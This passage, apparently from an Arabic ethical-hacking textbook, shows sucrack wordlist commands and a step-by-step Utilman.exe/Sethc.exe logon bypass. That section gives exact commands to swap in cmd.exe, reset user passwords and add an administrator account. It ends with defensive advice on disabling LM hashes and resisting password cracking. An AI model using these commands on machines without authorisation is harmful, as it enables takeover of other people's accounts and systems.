‫اﻟﺘﺮﻣﻨﺎل وﺗﻨﻔﯿﺬ اﻷﻣﺮ‪ sucrack‬ﻛﺎﻻﺗﻰ‪:‬‬
‫‪#sucrack /usr/share/wordlists/rockyou.txt‬‬
‫‪ -2‬إذا ﻛﻨﺖ ﺗﺮﻏﺐ ﻓﻲ ﺟﻌﻞ ‪ sucrack‬ﯾﻘﻮم ﺑﻌﻤﻠﯿﺘﯿﻦ ﻓﻲ وﻗﺖ واﺣﺪ‪ ،‬وﺗﺮﻏﺐ ﻓﻲ ﻋﺮض اﻻﺣﺼﺎءات ﻛﻞ ‪ 6‬ﺛﻮان‪ ،‬وﺗﺮﻏﺐ ﻓﻲ ﺗﻌﯿﯿﻦ‬
‫رﻣﻮز ‪ANSI escape‬ﻻﺳﺘﺨﺪاﻣﮭﺎ‪ ،‬ﯾﻤﻜﻨﻚ اﺳﺘﺨﺪام اﻷﻣﺮ اﻟﺘﺎﻟﻲ‪:‬‬
‫‪#sucrack –w 2 –s 6 –a /usr/share/wordlists/rockyou.txt‬‬

‫‪Bypass Windows Logons with the Utilman.exe Trick‬‬


‫‪Utilman.exe‬ﺗﻄﺒﯿﻖ ﺗﻢ ﺑﻨﺎﺋﮫ ﻓﻲ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ وﯾﻨﺪوز‪ ,‬وﺗﻢ ﺗﺼﻤﯿﻤﮫ ﻟﻠﺴﻤﺎح ﻟﻠﻤﺴﺘﺨﺪم ﺑﺘﻜﻮﯾﻦ ﺧﯿﺎرات اﻟﻮﺻﻮل ﻣﺜﻞ ﻣﻜﺒﺮ اﻟﺸﺎﺷﺔ‬
‫)‪ ، (Magnifier‬وﻧﺴﻖ اﻟﺘﺒﺎﯾﻦ اﻟﻌﺎﻟﻲ )‪ ، (High Contrast Theme‬و ‪ ،Narrator‬وﻟﻮﺣﺔ اﻟﻤﻔﺎﺗﯿﺢ ﻋﻠﻰ اﻟﺸﺎﺷﺔ )‪(On Screen Keyboard‬‬
‫ﻗﺒﻞ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل إﻟﻰ اﻟﻨﻈﺎم‪.‬‬
‫ﺗﻢ ﺗﺼﻤﯿﻢ ھﺬا ﻟﻤﺴﺎﻋﺪة اﻟﻨﺎس اﻟﺬﯾﻦ ھﻢ ﺿﻌﺎف اﻟﺒﺼﺮ أو اﻟﺴﻤﻊ او اﻟﺤﺮﻛﺔ ﻓﻲ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل إﻟﻰ ‪ Windows‬ﺑﺄﻧﻔﺴﮭﻢ دون اﻟﺤﺎﺟﺔ ﻟﻠﻤﺴﺎﻋﺪة‬
‫ﻣﻦ اﻟﺨﺎرج‪ .‬ﻟﮭﺎ ﻣﯿﺰة ﻛﺒﯿﺮة ﻟﻸﺷﺨﺎص ذوي اﻹﻋﺎﻗﺔ وﻟﻜﻨﮫ ﯾﻔﺘﺢ ﺛﻐﺮة أﻣﻨﯿﺔ ﯾﻤﻜﻦ ﻟﻨﺎ أن ﻧﺴﺘﻔﯿﺪ ﻣﻨﮭﺎ ﻣﻦ ﺧﻼل ﺗﺠﺎوز ﻋﻤﻠﯿﺎت ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل‬
‫إﻟﻰ اﻟﻮﯾﻨﺪوز‪.‬‬

‫ﺗﺠﺎوز ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل إﻟﻰ ‪ Windows‬ﺗﺄﺗﻲ ﻓﻲ ﻣﺘﻨﺎول اﻟﯿﺪﯾﻦ إذا ان ﻋﻤﻼﺋﻨﺎ ﻗﺪ ﻧﺴﻮا ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﺨﺎﺻﺔ ﺑﮭﻢ ﻟﺘﺴﺠﯿﻞ اﻟﺪﺧﻮل أو ﺗﻢ ﺗﻠﻒ‬
‫ﻣﻠﻔﺎت ﺗﻌﺮﯾﻒ اﻟﻤﺴﺘﺨﺪم اﻟﺨﺎﺻﺔ ﺑﮭﻢ أو ﯾﻮﺟﺪ ﺗﺪﺧﻞ ﻣﻦ اﻟﺘﻄﺒﯿﻘﺎت اﻟﺨﺒﯿﺜﺔ )‪(malware‬ﻣﻊ اﻟﻨﻈﺎم ﻗﺒﻞ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل‪.‬‬
‫ﯾﻌﻤﻞ ھﺬا ﻷن اﻟﻤﺴﺘﺨﺪم ﯾﻤﻜﻦ أن ﺗﺆدي ‪ Utilman‬ﻋﻦ طﺮﯾﻖ اﻟﻀﻐﻂ ﻋﻠﻰ ﻣﻔﺘﺎح وﯾﻨﺪوز‪ U +‬ﻗﺒﻞ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل إﻟﻰ وﯾﻨﺪوز‪ .‬ﺣﯿﺚ ھﺬا‬
‫ﺳﻮف ﯾﻘﻮم ﺑﺘﺸﻐﯿﻞ ﻣﻠﻒ ‪ Utilman.exe‬اﻟﻘﺎﺑﻞ ﻟﻠﺘﻨﻔﯿﺬ اﻟﺬي ﯾﺘﻮاﺟﺪ ﻓﻲ اﻟﻤﺠﻠﺪ‪ . Windows\System32‬إذا ﻗﻤﺖ ﺑﺘﺒﺪﯾﻞ اﻟﻤﻠﻒ‪Utilman.exe‬‬
‫ﻣﻊ ﺷﻲء آﺧﺮ ﻣﺜﻞ‪ ، cmd.exe‬ﻓﺴﻮف ﯾﻜﻮن ﻟﺪﯾﻚ ﺣﻖ اﻟﻮﺻﻮل إﻟﻰ ﻣﻮﺟﮫ اﻷواﻣﺮ ﻣﻊ اﻣﺘﯿﺎزات اﻟﻨﻈﺎم )‪ .(system privileges‬ﺣﺴﺎب‬
‫اﻣﺘﯿﺎزات اﻟﻨﻈﺎم )‪ (system privileges‬ھﻮ أﻋﻠﻰ اﻣﺘﯿﺎزات ﻣﻤﻜﻨﮫ ﻋﻠﻰ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ وﯾﻨﺪوز واﻟﺘﻲ ھﻲ ﻣﻤﺎﺛﻠﮫ ﻟﻠﺤﺴﺎب ‪ root‬ﻓﻲ أﻧﻈﻤﺔ‬
‫‪.linux‬‬

‫ﻛﯿﻒ ﯾﻤﻜﻦ اﻟﻘﯿﺎم ﺑﺬﻟﻚ‪:‬‬

‫‪ -‬أوﻻً وﻗﺒﻞ ﻛﻞ ﺷﻲء‪ ،‬ﺳﻮف ﺗﺤﺘﺎج إﻟﻰ وﺳﯿﻠﺔ ﻟﻠﻮﺻﻮل إﻟﻰ ﻧﻈﺎم اﻟﻤﻠﻔﺎت ﻟﻤﺒﺎدﻟﺔ ‪Utilman.exe‬ﻣﻊ ﺷﻲء آﺧﺮ ﻣﺜﻞ‪. cmd.exe‬‬
‫وھﻨﺎك ﻋﺪد ﻗﻠﯿﻞ ﻣﻦ اﻟﻄﺮق اﻟﺘﻲ ﺗﺤﻘﻖ ذﻟﻚ‪:‬‬
‫‪ ‬إزاﻟﺔ اﻟﻘﺮص اﻟﺼﻠﺐ اﻟﺬي ﯾﺤﺘﻮي ﻋﻠﻰ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ ﻣﻦ اﻟﻨﻈﺎم اﻟﻤﺴﺘﮭﺪف وﺟﻌﻠﮫ ﻗﺮص ﺛﺎﻧﻮي )‪ (slave‬ﻓﻲ ﻧﻈﺎم آﺧﺮ‪ .‬وﻣﻦ‬
‫ھﻨﺎك ﯾﻤﻜﻨﻚ ﻣﺒﺎدﻟﺔ اﻟﻤﻠﻔﺎت اﻟﻤﻮﺟﻮدة‪.‬‬
‫‪ ‬اﺳﺘﺨﺪام "ﻗﺮص اﻟﺘﻤﮭﯿﺪ" ﻣﺜﻞ ‪ UBCD4Win‬واﺳﺘﺨﺪام ﺑﺮاﻣﺞ إدارة ﻣﻠﻒ ھﻨﺎك او ‪ Live kali CD‬ﻛﻤﺎ ﺗﺤﺪﺛﻨﺎ ﻋﻨﮫ ﺳﺎﺑﻘﺎ‪.‬‬
‫‪ ‬اﺳﺘﺨﺪام أﺳﻄﻮاﻧﺔ ‪ DVD‬او ‪ CD‬اﻟﺬي ﺗﺤﺘﻮي ﻋﻠﻰ وﯾﻨﺪوز ‪Vista‬أو‪ 7‬او ‪.8‬‬

‫ﻟﻘﺪ ﺗﻜﻠﻤﺎن ﺳﺎﺑﻘﺎ اﻟﻰ ﻛﯿﻔﯿﺔ اﺳﺘﺨﺪام ‪ Live kali CD‬اﻣﺎ ھﻨﺎ ﺳﻮف ﻧﺴﺘﺨﺪم طﺮﯾﻘﺔ أﺧﺮى ﺣﯿﺚ ﻓﻲ ھﺬا اﻟﻤﺜﺎل ﺳﻮف ﻧﺴﺘﺨﺪم‬ ‫‪-‬‬
‫"وﯾﻨﺪوز ‪ ."DVD 7‬ﻟﻠﺒﺪء‪ ،‬اﻟﺘﻤﮭﯿﺪ ﻣﻦ ﻗﺮص ‪ DVD‬اﻟﺨﺎص ب ‪ Windows 7‬وﻋﻨﺪ اﻟﻮﺻﻮل إﻟﻰ اﻟﺸﺎﺷﺔ اﻷوﻟﻰ ﯾﺴﺄل ﻋﻦ اﻟﻠﻐﺔ‬
‫واﻟﻌﻤﻠﺔ وﺗﻨﺴﯿﻖ ﻟﻮﺣﺔ اﻟﻤﻔﺎﺗﯿﺢ‪ ،‬اﻧﻘﺮ ﻓﻮق ‪.NEXT‬‬
‫ﻓﻲ اﻟﺼﻔﺤﺔ اﻟﺘﺎﻟﯿﺔ‪ ،‬أﺳﻔﻞ اﻟﺻﻔﺣﺔ ﻓﻲ اﻟﺠﺎﻧﺐ اﻷﯾﺴﺮ اﻟﺴﻔﻠﻲ‪ ،‬اﻧﻘﺮ ﻓﻮق اﻻرﺗﺒﺎط "‪." Repair your computer‬‬ ‫‪-‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪389‬‬

‫اﻟﺨﻄﻮة ﺗﺎﻟﯿﺔ‪ ،‬ﻧﺤﺪد "‪ . “Use recovery tools that can help fix problems starting Windows‬ﺛﻢ ﻧﺤﺪد ﻧﻈﺎم‬ ‫‪-‬‬
‫اﻟﺘﺸﻐﯿﻞ إﺻﻼح‪ ،‬ﺑﻌﺪ اﺧﺘﺮ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ ﻣﻦ اﻟﻘﺎﺋﻤﺔ‪ ،‬ﻧﻨﻘﺮ ﻓﻮق ‪.Next‬‬

‫ﺳﯿﻜﻮن اﻻن ﻟﺪﯾﻚ ﺧﯿﺎر "‪ ." Choose a recovery tool‬ﻧﺤﺪد ﻣﻮﺟﮫ اﻷواﻣﺮ)‪. (Command prompt‬‬ ‫‪-‬‬
‫ﺗﻜﻮن اﻻن ﻗﺪ ﻓﺘﺤﺖ "ﻧﺎﻓﺬة ﻣﻮﺟﮫ اﻷواﻣﺮ"‪ .‬ﻧﻜﺘﺐ اﻷواﻣﺮ اﻟﺘﺎﻟﯿﺔ‪:‬‬ ‫‪-‬‬
‫\‪C:‬‬
‫‪cd windows\system32‬‬
‫‪ren utilman.exe utilman.exe.bak‬‬
‫‪copy cmd.exe utilman.exe‬‬
‫ﺣﯿﺚ ھﺬا ﺳﻮف ﯾﻨﺘﻘﻞ اﻟﻰ اﻟﻤﺠﻠﺪ ‪ system32‬ﺛﻢ ﯾﻘﻮم إﻋﺎدة ﺗﺴﻤﯿﺔ اﻟﻤﻠﻒ اﻷﺻﻠﻲ ‪ Utilman.exe‬اﻟﻰ أي اﺳﻢ اﺧﺮ ﺛﻢ ﯾﺄﺧﺬ ﻧﺴﺨﮫ ﻣﻦ اﻟﻤﻠﻒ‬
‫‪ cmd.exe‬وﯾﻌﯿﺪ ﺗﺴﻤﯿﺘﮭﺎ اﻟﻰ ‪ Utilman.exe‬ﻟﺘﺼﺒﺢ ھﻲ اﻟﻤﻠﻒ اﻟﺒﺪﯾﻞ ﻟﻠﻤﻒ اﻷﺻﻠﻲ‪.‬‬
‫ﺣﯿﺚ ان اﻟﻔﻜﺮة ﻗﺎﺋﻤﮫ ﻋﻠﻰ اﺳﺘﺒﺪال اﻟﻤﻠﻒ ‪ Utilman.exe‬ﺑﻤﻮﺟﮫ اﻷواﻣﺮ ‪ cmd.exe‬ﻋﻦ طﺮﯾﻖ ﺗﻐﯿﺮ اﻷﺳﻤﺎء ﻓﻘﻂ وﯾﻤﻜﻦ أﯾﻀﺎ اﺳﺘﺒﺪاﻟﮫ ﺑﺄي‬
‫ﻣﻠﻒ ﻗﺎﺑﻞ ﻟﻠﺘﻨﻔﯿﺬ اﺧﺮ‪.‬‬
‫ﺑﻤﺠﺮد ﺗﺸﻐﯿﻞ اﻟﻜﻤﺒﯿﻮﺗﺮ ﺑﺎﻟﻄﺮﯾﻘﺔ اﻟﻌﺎدﯾﺔ‪ ،‬ﻧﻨﻘﺮ ﻓﻮق ﺗﺮﻛﯿﺒﺔ اﻟﻤﻔﺎﺗﯿﺢ ‪ Windows + U‬واﻟﺘﻲ ﺗﺆدى اﻟﻰ اﻟﺤﺼﻮل ﻋﻠﻰ ﻣﻮﺟﮫ اﻷواﻣﺮ‪ .‬إذا ﻟﻢ‬
‫ﯾﻈﮭﺮ ﻣﻮﺟﮫ اﻷواﻣﺮ‪ ،‬ﻧﻨﻘﺮ ﻓﻮق ‪ Alt + Tab‬ﺣﯿﺚ ﻗﺪ ﯾﻈﮭﺮ ﻣﻮﺟﮫ اﻷواﻣﺮ ﻣﻦ وراء ﺷﺎﺷﺔ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل‪ .‬ﻣﻦ ھﻨﺎ‪ ،‬ﯾﻤﻜﻨﻚ ﺗﺸﻐﯿﻞ اﻟﻜﺜﯿﺮ )أن‬
‫ﻟﻢ ﯾﻜﻦ ﻛﻠﮭﺎ( ﻣﻦ اﻷواﻣﺮ اﻟﺘﻲ ﯾﻤﻜﻦ اﺳﺘﺨﺪاﻣﮭﺎ ﻋﺎدة ﻓﻲ ﻣﻮﺟﮫ اﻷواﻣﺮ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪390‬‬

‫إﻋﺎدة ﺗﻌﯿﯿﻦ ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﺨﺎﺻﺔ ﺑﻤﺴﺘﺨﺪﻣﯿﻦ اﻟﻤﻮﺟﻮدة‬


‫ﺗﺤﺬﯾﺮ‪ :‬إذا ﻛﺎن ﯾﻤﻜﻨﻚ إﻋﺎدة ﺗﻌﯿﯿﻦ ﻛﻠﻤﺔ ﻣﺮور ﻟﺤﺴﺎب ﻣﺴﺘﺨﺪﻣﯿﻦ‪ .‬ﻓﺈﻧﻚ ﺗﻔﻘﺪ اﻟﻮﺻﻮل إﻟﻰ اﻟﻤﻠﻔﺎت اﻟﻤﺸﻔﺮة اﻟﺨﺎﺻﺔ ﺑﺎﻟﻤﺴﺘﺨﺪﻣﯿﻦ‬
‫ﺑﺸﻜﻞ داﺋﻢ‪ .‬ﻟﺬﻟﻚ ﺗﺄﻛﺪ ﻣﻦ إﺟﺮاء ﻧﺴﺦ اﺣﺘﯿﺎطﻲ ﻟﮭﺬه اﻟﻤﻠﻔﺎت‪.‬‬
‫‪ -‬ﻹﻋﺎدة ﺗﻌﯿﯿﻦ ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﺨﺎﺻﺔ ﺑﻤﺴﺘﺨﺪم ﻣﻮﺟﻮد‪ ،‬ﻓﻨﺤﻦ ﺑﺤﺎﺟﺔ إﻟﻰ ﻛﺘﺎﺑﺔ اﻟﻨﺺ اﻟﺘﺎﻟﻲ‪ .‬ﻓﻲ ھﺬا اﻟﻤﺜﺎل‪ ،‬ﺳﻮف ﻧﻘﻮم ﺑﺘﻐﯿﯿﺮ ﻛﻠﻤﺔ‬
‫اﻟﻤﺮور اﻟﻤﺴﺘﺨﺪم ‪JohnDoe’s‬إﻟﻰ‪. "hunter2″‬‬
‫‪net user JohnDoe hunter2‬‬
‫ﯾﺠﺐ أن ﺗﻜﻮن ﻗﺎدرا ً ﻋﻠﻰ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﺑﺎﺳﺘﺨﺪام ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﺠﺪﯾﺪة ھﺬه ﻋﻠﻰ اﻟﻔﻮر‪.‬‬
‫‪ -‬إذا ﻛﻨﺖ ﻻ ﺗﻌﺮف ﻓﻲ اﻟﻮاﻗﻊ اﺳﻢ اﻟﻤﺴﺘﺨﺪم ﻓﻲ ھﺬا اﻟﻨﻈﺎم‪ ،‬ﯾﻤﻜﻨﻚ أن ﺗﺮى ﻗﺎﺋﻤﺔ ﺑﺎﻟﻤﺴﺘﺨﺪﻣﯿﻦ اﻟﺤﺎﻟﯿﻦ ﻋﻦ طﺮﯾﻖ ﻛﺘﺎﺑﺔ اﻻﺗﻲ‪:‬‬
‫‪net user‬‬
‫‪ -‬ﻹﻧﺸﺎء ﺣﺴﺎب ﻣﺴﺘﺨﺪم ﺟﺪﯾﺪ‬
‫ﻹﻧﺸﺎء ﺣﺴﺎب ﻣﺴﺘﺨﺪم ﺟﺪﯾﺪ ﻓﻲ ﻣﻮﺟﮫ اﻷواﻣﺮ )اﺳﻢ اﻟﻤﺴﺘﺨﺪم‪ NewGuy :‬وﻛﻠﻤﺔ اﻟﻤﺮور‪ ،(abc123 :‬وإﺿﺎﻓﺘﮭﺎ إﻟﻰ اﻟﺠﺮوب اﻟﺨﺎص‬
‫ﺑﺎﻟﻤﺴﺌﻮﻟﯿﻦ ﻋﻦ طﺮﯾﻖ ﻛﺘﺎﺑﺔ اﻻﺗﻲ‪:‬‬
‫‪net user NewGuy abc123 /add‬‬
‫‪net localgroup Administrators NewGuy /add‬‬
‫ﻣﺮة أﺧﺮى‪ ،‬ﯾﺠﺐ أن ﺗﻜﻮن ﻗﺎدرا ً ﻋﻠﻰ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﻋﻠﻰ اﻟﻔﻮر ﻣﻊ ھﺬا اﻟﺤﺴﺎب اﻟﺠﺪﯾﺪ‪.‬‬
‫ﺗﻐﯿﯿﺮات اﻟﻌﻮدة‬
‫ﻻﺳﺘﻌﺎدة‪ ، utilman.exe‬ﻓﻲ ﻣﻮﺟﮫ اﻷواﻣﺮ ﻧﻜﺘﺐ اﻻﺗﻲ‪:‬‬
‫‪C:‬‬
‫‪cd windows\system32‬‬
‫‪del utilman.exe‬‬
‫‪ren utilman.exe.bak utilman.exe‬‬
‫ﺛﻢ إﻋﺎدة ﺗﺸﻐﯿﻞ اﻟﻨﻈﺎم‪.‬‬
‫ﻹزاﻟﺔ ﺣﺴﺎب اﻟﻤﺴﺘﺨﺪم اﻟﺠﺪﯾﺪ اﻟﺬي ﻗﻤﺖ ﺑﺈﻧﺸﺎﺋﮫ ﻓﻲ وﻗﺖ ﺳﺎﺑﻖ‪ ،‬ﻧﻜﺘﺐ اﻻﺗﻲ‪:‬‬
‫‪net user NewGuy /delete‬‬
‫ھﺬا ﯾﻌﻤﻞ ﻓﻲ ﻛﺎﻓﺔ إﺻﺪارات ﻣﺎﯾﻜﺮوﺳﻮﻓﺖ وﯾﻨﺪوز ﺑﺪاﯾﺔ ﻣﻦ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ وﯾﻨﺪوز ‪ x9‬اﻟﻰ اﺧﺮ اﺻﺪار ﺣﺘﻰ اﻻن‪ .‬ﻛﻤﺎ أﻧﮭﺎ ﺗﻌﻤﻞ ﻓﻲ اﻟﻤﻨﺘﺠﺎت‬
‫‪ Server‬اﻟﺨﺎﺻﺔ ﺑﮭﻢ‪.‬‬
‫ﯾﻤﻜﻨﻚ أﯾﻀﺎ اﺳﺘﺨﺪام اﻷداة ‪ Mimikatz‬ﻟﻠﺘﻌﺎﻣﻞ ﻣﻊ ﻛﻠﻤﺎت ﻣﺮور ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل‪.‬‬

‫اﻟﺘﻌﺪﯾﻞ ﻋﻠﻰ اﻟﻤﻠﻒ "‪ "Sethc.exe‬ﺑﻨﻔﺲ اﻟﻄﺮﯾﻘﺔ اﻟﺴﺎﺑﻘﺔ ﯾﺴﻤﺢ أﯾﻀﺎ ﻟﻚ ﺑﺘﺠﺎوز ﺷﺎﺷﺔ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﻟﻮﯾﻨﺪوز‪ .‬واﻟﻤﻠﻒ"‪ "sethc.exe‬ھﻮ‬
‫ﻟﻮظﯿﻔﺔ ‪ .Windows Sticky Keys‬ﻓﻲ إطﺎر اﻟﻌﻤﻠﯿﺔ اﻟﻌﺎدﯾﺔ‪ ،‬إذا ﻗﻤﺖ ﺑﺎﻟﻀﺮب ﻋﻠﻰ ﻣﻔﺘﺎح ‪Shift‬ﺧﻤﺲ ﻣﺮات ﻋﻠﻰ اﻟﺘﻮاﻟﻲ‪ ،‬ﻓﮭﺬا ﺳﻮف‬
‫ﯾﺆدى اﻟﻰ ظﮭﻮر ﻣﺮﺑﻊ اﻟﺤﻮار ‪ .sticky key dialog box‬ﺑﺎﺳﺘﺨﺪام ﻧﻔﺲ اﻟﻄﺮﯾﻖ اﻟﺴﺎﺑﻘﺔ واﻟﺘﻲ ﻗﻤﻨﺎ ﺑﮭﺎ ﻣﻊ ‪ ،Utilman.exe‬ﻓﺒﻤﺠﺮد‬
‫اﻟﻀﺮب ﻋﻠﻰ ﻣﻔﺘﺎح ‪ shift‬ﺧﻤﺲ ﻣﺮات ﻓﻲ ﺷﺎﺷﺔ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﻓﺎﻧﮫ ﯾﺆدى اﻟﻰ ﻓﺘﺢ ﻣﻮﺟﮫ اﻷواﻣﺮ ﻋﻠﻰ ﻣﺴﺘﻮى اﻟﻨﻈﺎم‪.‬‬

‫‪LM Hash Backward Compatibility‬‬

‫‪ LM Hash Backward Compatibility‬ھو ﺧﺎدم ﯾﺳﺗﻧد إﻟﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل ‪ Windows 2000‬و ‪ Windows Server 2003‬و‬
‫ﯾﻣﻛﻧﮫ ﻣﺻﺎدﻗﺔ اﻟﻣﺳﺗﺧدﻣﯾن اﻟﺗﻲ ﺗﻘوم ﺑﺗﺷﻐﯾل ﺟﻣﯾﻊ إﺻدارات وﯾﻧدوز‪ .‬ﻋﻣﻼء ‪ Windows 95/98‬ﻻ ﺗﺳﺗﺧدم ‪ Kerberos‬ﻓﻲ اﻟﻣﺻﺎدﻗﺔ‪.‬‬
‫ﻣن أﺟل ‪ ،Backward Compatibility‬ﻓﺎن وﯾﻧدوز ‪ 2000‬و ‪Windows Server 2003‬ﺗدﻋم اﻻﺗﻲ‪:‬‬
‫‪LAN Manager (LM) authentication‬‬
‫‪Windows NT (NTLM) authentication‬‬
‫‪NTLM version 2 (NTLMv2) authentication‬‬
‫ﯾﺗم اﺳﺗﺧدام ‪ (Unicode hash) NT Hash‬ﻓﻲ ‪ NTLMv2 ،NTLMv1‬و‪ .Kerberos‬ﯾﺳﺗﺧدم ﺑروﺗوﻛول اﻟﻣﺻﺎدﻗﺔ ‪."LM hash" LM‬‬
‫ﻻ ﺗﻘم ﺑﺗﺧزﯾن ‪ ،LM hash‬إذا ﻟم ﯾﻛن ﺿرورﯾﺎ‪ ،‬ﻣن أﺟل اﻟﺗواﻓﻖ ﻣﻊ اﻹﺻدارات اﻟﺳﺎﺑﻘﺔ‪ .‬إذا ﺗم ﺗﺧزﯾن ‪ ،LM hash‬ﻓﺎن ﻋﻣﻼء ﺷﺑﻛﺎت‬
‫‪ Windows98 ،Windows95‬أو ﻣﺎﻛﻧﺗوش ﻗد ﺗواﺟﮫ ﻣﺷﺎﻛل اﻟﺗواﻓﻖ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


391

(How to Disable LM HASH) LM HASH ‫ﻛﯾﻔﯾﺔ اﻟﻐﺎء ﺗﻔﻌﯾل اﺳﺗﺧدام‬

:‫ﻛﺎﻻﺗﻰ‬LM hash ‫ﯾوﺟد ﻋدة طرق ﻹﻟﻐﺎء ﺗﻔﻌﯾل‬

(Implement the NoLMHash Policy by Using a Group Policy) Group policy ‫ ﺑﺎﺳﺗﺧدام‬NoLMHash ‫ ﺗﻧﻔﯾذ ﺳﯾﺎﺳﺔ‬-1
:‫ ﻧﺗﺑﻊ اﻟﺧطوات ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‬،local group policy ‫ ﻣن ﺧﻼل ﺗطﺑﯾﻖ ﻧﮭﺞ‬SAM ‫ ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت‬LM hash ‫ﻟﺗﻌطﯾل ﺗﺧزﯾن‬
- In Windows version  In Control Panel  Administrative Tools  Local Security Policy  Local
Policies  Security Options.
- In Windows server version  In Group policy, select Computer Configuration  Windows Setting
 Security Setting  Local Policies  Security Options.
- In the list of available policies, double-click Network security: Do not store LAN Manager Hash
value on next password change
- Click Enabled  Ok

.8‫ و‬7‫ وﺗﻛون ﻓﻲ ھذا اﻟوﺿﻊ اﻓﺗراﺿﯾﺎ ﻓﻲ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﺑداﯾﺔ ﻣن ﻓﯾﺳﺗﺎ و‬Enable ‫ﻛﻣﺎ ﻧﻼﺣظ ﯾﺟب ان ﺗﻛون ﻓﻲ وﺿﻊ‬
(Implement the NoLMHash Policy by Editing the Registry) ‫ ﻋن طرﯾﻖ ﺗﻌدﯾل ﻣﻠف اﻟﺳﺟل‬NoLMHash ‫ ﺗﻧﻔﯾذ ﺳﯾﺎﺳﺔ‬-2
registry ‫وذﻟك ﻋن طرﯾﻖ إﯾﺟﺎد اﻟﻣﻔﺗﺎح اﻟﺗﺎﻟﻲ ﻓﻲ ﻣﻠف‬
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
NoLMHash ‫ﺛم ﻧﻘوم ﺑﺈﺿﺎﻓﺔ ﻣﻔﺗﺎح‬

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


‫‪392‬‬

‫‪ -3‬ﻧﺳﺗﺧدم ﻛﻠﻣﺎت ﻣرور واﻟﺗﻲ ﻋﻠﻰ اﻷﻗل أﻛﺑر ﻣن ‪ 15‬ﻗﯾﻣﺔ )‪(Use a Password that is at Least 15 Characters Long‬‬
‫ﺣﯾث ان ﻧواﻓذ اﻟوﯾﻧدوز ﺗﻘوم ﺑﺗﺷﻔﯾر ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﺻورة ‪ LM HASH‬واﻟﺗﻲ ﺗﻛون اﻗل ﻣن ‪ 15‬ﺣرف اﻣﺎ ﻣﺎ ﯾزﯾد ﻓﻠن ﯾﺳﺗطﯾﻊ‬
‫ﺗﺧزﯾﻧﮫ ﻓﻲ ﺻورة ‪ LM hash‬ﺣﯾث ﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ ان ﺳﻌﺗﮫ ‪ 14‬ﺣرف ﻓﻘط‪.‬‬

‫ﻛﯾف ﺗداﻓﻊ ﺿد ھﺟﻣﺎت ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ‪How to Defend Against Password Cracking‬‬

‫ﺗﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور )‪ ،(Password Cracking‬واﻟﻣﻌروف أﯾﺿﺎ ‪ ،Password Hacking‬ھو ﻣﺻطﻠﺢ ﯾﺳﺗﺧدم ﻟﺗﺣدﯾد ﻋﻣﻠﯾﺔ اﻛﺗﺳﺎب‬
‫اﻻﺳﺗﺧدام اﻟﻐﯾر ﻣﺻرح ﺑﮫ ﻟﻠﺷﺑﻛﺔ‪ ،‬ﻧظﺎم‪ ،‬أو اﻟﻣوارد اﻟﺗﻲ ﯾﺗم ﺗﺄﻣﯾﻧﮭﺎ ﻣﻊ ﻛﻠﻣﺔ ﻣرور‪ .‬اﻟطرﯾﻘﺔ اﻷﺳﺎﺳﯾﺔ ﻟﺗﻛﺳﯾر ﻛﻠﻣﺔ ﻣرور ھو ﺗﺧﻣﯾن ﻛﻠﻣﺔ‬
‫اﻟﻣرور‪ .‬طرﯾﻘﺔ أﺧرى ھﻲ ﻣﺣﺎوﻟﺔ ﺗوﻟﯾﻔﺎت ﻣﺧﺗﻠﻔﺔ ﻣرارا وﺗﻛرارا‪ .‬ﯾﺗم ذﻟك ﺑﺎﺳﺗﺧدام ﺧوارزﻣﯾﺔ اﻟﻛﻣﺑﯾوﺗر ﺣﯾث اﻟﻛﻣﺑﯾوﺗر ﯾﺣﺎول ﺗوﻟﯾﻔﺎت‬
‫ﻣﺧﺗﻠﻔﺔ ﻣن اﻷﺣرف وﺣﺗﻰ ﯾﺣﺻل ﻋﻠﻰ ﻣزﯾﺞ ﻧﺎﺟﺢ‪ .‬إذا ﻛﻠﻣﺔ اﻟﺳر ھﻲ ﺿﻌﯾﻔﺔ‪ ،‬وﻣن ﺛم ﯾﻣﻛن ان ﺗﺻدع ﺑﺳﮭوﻟﺔ‪ .‬ﻣن أﺟل ﺗﺟﻧب ﻣﺧﺎطر‬
